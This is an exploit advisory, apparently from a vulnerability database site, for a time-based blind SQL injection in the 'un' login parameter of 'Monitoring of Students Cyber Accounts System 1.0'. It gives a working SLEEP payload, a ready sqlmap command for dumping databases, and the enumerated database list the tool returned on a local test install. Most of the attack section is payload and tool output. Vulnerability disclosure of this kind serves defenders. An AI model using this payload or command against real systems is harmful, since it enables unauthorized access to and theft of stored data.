Monitoring Of Students Cyber Accounts System 1.0 SQL Injection

2021.03.13
Credit: Richard Jones
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Monitoring of Students Cyber Accounts System | 'un' SQL Injection # Exploit Author: Richard Jones # Date: 2021-03-12 # Vendor Homepage: https://www.sourcecodester.com/php/11743/monitoring-students-cyber-accounts.html # Software Link: https://www.sourcecodester.com/download-code?nid=11743&title=Monitoring+of+Students+Cyber+Accounts+System+using+PHP+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34 #Exploit: #Parameter: un (POST) # Type: time-based blind # Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) # Payload: un=aaaaa' AND (SELECT 2967 FROM (SELECT(SLEEP(5)))fGEg) AND 'VDNV'='VDNV&up=bbbbbb&log=Login #Example: # sqlmap -u http://127.0.0.1/MSCAB/login.php --risk 3 --level 3 --batch --dbs --data="un=asd&up=asdas&log=Login" #Results: #available databases [17]: #[*] asidatabase #[*] attendance #[*] attendance_management #[*] bilal #[*] carrental #[*] chatme #[*] dragonhousedb #[*] fbc_reviewer #[*] hrm #[*] information_schema #[*] mscabdb #[*] mysql #[*] performance_schema #[*] phpmyadmin #[*] sourcecodester_mysqli #[*] subriondb #[*] test


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top